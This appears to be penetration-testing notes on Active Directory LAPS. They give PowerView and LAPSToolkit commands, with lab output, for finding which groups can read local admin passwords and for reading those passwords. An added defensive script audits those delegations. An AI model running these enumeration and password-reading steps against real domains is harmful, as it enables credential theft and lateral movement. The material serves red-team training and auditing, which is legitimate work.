LAPSToolkit
## Manually

Discover which principals are allowed to read the ms-Mcs-AdmPwd attribute by reading its DACL on each computer object. The ACE of interest grants ReadProperty scoped to that single attribute, so filter on the resolved ObjectAceType:

```powershell
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier
```

```
CN=WKSTN-2,OU=Workstations,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1107
CN=WEB,OU=Web Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1108
CN=SQL-2,OU=SQL Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1108
CN=WKSTN-1,OU=Workstations,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1107
```

Resolve the SIDs to see which groups hold the delegation:

```powershell
ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
```

```
DEV\Developers
```

```powershell
ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1108
```

```
DEV\Support Engineers
```

## LAPSToolkit

```powershell
Import-Module C:\Tools\LAPSToolkit\LAPSToolkit.ps1
```

Discover computers using LAPS:

```powershell
Get-LAPSComputers
```

```
ComputerName Password Expiration
------------ -------- ----------
appsrv01.corp1.com 12/14/2019 04:18:03
```

Discover groups that can enumerate the LAPS data:
Use PowerView to enumerate the members of that group through Get-NetGroupMember, supplying the -GroupName option to specify the group name.

To get a computer's password, simply read the attribute.

Or with LAPSToolkit.
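The same two questions (which principals can read ms-Mcs-AdmPwd on which LAPS-managed computers, and who sits inside those principals once group membership is expanded) are what a defender should be auditing on a schedule. The script below is an added example written for this page; it is not part of the original notes, PowerView or LAPSToolkit. It uses only the Microsoft ActiveDirectory (RSAT) module, never reads a password, and flags any reader that is not on an approved list. `$ExpectedReaders` is a placeholder that must be replaced with the site's own approved principals, and the caller is assumed to be able to read computer object DACLs.

```powershell
# Added example (not from the original page or LAPSToolkit): audit LAPS password
# delegation with the Microsoft ActiveDirectory module.
# Assumptions: RSAT AD module installed, caller can read computer DACLs,
# $ExpectedReaders is a placeholder list for this environment.
Import-Module ActiveDirectory

# Principals that are SUPPOSED to read LAPS passwords; anything else is flagged.
$ExpectedReaders = @('DEV\Domain Admins')   # placeholder, adjust per environment

# ACEs carry the attribute's schema GUID, not its name, so look the GUID up once.
$schemaNC   = (Get-ADRootDSE).schemaNamingContext
$attrSchema = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
$AdmPwdGuid = [guid]$attrSchema.schemaIDGUID
$AllAttrs   = [guid]::Empty   # an ACE with an empty ObjectType covers every attribute

# Reading a confidential attribute needs ReadProperty plus the control-access
# (extended) right; GenericAll and GenericRead already include these bits.
$ReadBits = [System.DirectoryServices.ActiveDirectoryRights]::ReadProperty -bor
            [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight

# Only computers that LAPS actually manages carry an expiration timestamp.
$lapsComputers = Get-ADComputer -LDAPFilter '(ms-Mcs-AdmPwdExpirationTime=*)'

$findings = foreach ($c in $lapsComputers) {
    $acl = Get-Acl -Path ("AD:\" + $c.DistinguishedName)
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.ObjectType -ne $AdmPwdGuid -and $ace.ObjectType -ne $AllAttrs) { continue }
        if (($ace.ActiveDirectoryRights -band $ReadBits) -eq 0) { continue }
        $scope = if ($ace.ObjectType -eq $AdmPwdGuid) { 'ms-Mcs-AdmPwd' } else { 'all attributes' }
        [pscustomobject]@{
            Computer  = $c.Name
            Principal = $ace.IdentityReference.Value   # DOMAIN\name where resolvable, else the SID
            Rights    = $ace.ActiveDirectoryRights
            Inherited = $ace.IsInherited                # inherited ACEs usually come from an OU delegation
            Scope     = $scope
        }
    }
}

# One row per principal, with groups expanded (the Get-NetGroupMember step) so the
# report shows the people who actually end up able to read the passwords.
$report = $findings | Group-Object Principal | ForEach-Object {
    $principal = $_.Name
    $sam       = $principal.Split('\')[-1]
    $members   = @()
    try {
        $members = @(Get-ADGroupMember -Identity $sam -Recursive -ErrorAction Stop |
                     Select-Object -ExpandProperty SamAccountName)
    } catch { }   # not a group, or not resolvable: leave the member list empty
    [pscustomobject]@{
        Principal   = $principal
        Expected    = $ExpectedReaders -contains $principal
        Computers   = ($_.Group.Computer | Sort-Object -Unique) -join ', '
        MemberCount = $members.Count
        Members     = ($members | Sort-Object) -join ', '
    }
}

# Anything not in $ExpectedReaders is a delegation to review or remove.
$report | Sort-Object Expected, Principal | Format-Table -AutoSize
$report | Where-Object { -not $_.Expected } | Export-Csv -NoTypeInformation -Path .\laps-reader-review.csv
```

Two details matter when reading the output. An ACE whose `Scope` is "all attributes" (GenericAll, GenericRead or an unscoped ReadProperty plus ExtendedRight) grants the password read even though it never names ms-Mcs-AdmPwd, which is why the script does not filter on the attribute GUID alone as the PowerView one-liner above does. And `Inherited = True` on many computers with the same principal points at an OU-level delegation, so the fix belongs on the OU rather than on individual computer objects.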